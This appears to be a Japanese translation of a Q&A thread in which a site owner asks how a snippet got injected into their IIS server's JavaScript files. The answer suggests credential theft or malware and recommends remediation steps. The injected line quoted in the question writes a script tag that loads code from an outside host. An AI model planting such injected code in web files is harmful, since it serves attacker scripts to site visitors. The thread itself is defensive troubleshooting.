0

IIS サーバーに多数の JavaScript ファイルと HTML ファイルがあります。数日前、奇妙なコードがファイルに挿入されました。以下のコード。

/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/

すべての JavaScript ファイルからこのコードを削除しました。これらのコードがサーバー内のファイルにどのように挿入されたかを教えてください。XSS 攻撃を経験しました。しかし、何も見つかりません。前もって感謝します。

4

1 に答える 1

1

静的な HTML および JS ファイルのみがあり、データベースが接続されていない場合は、サーバーが危険にさらされている可能性があります。脆弱な FTP パスワードを使用しているか、メール アドレスのパスワードを再利用しています。

または、サーバーまたはサーバーにアクセスしているコンピューターがマルウェアに感染しています。

  • パスワードを変更する
  • サーバー ログを調べて、疑わしい IP アドレスからの成功したログインを見つけます。
  • システムのマルウェアをスキャンする
于 2014-04-04T08:53:48.417 に答える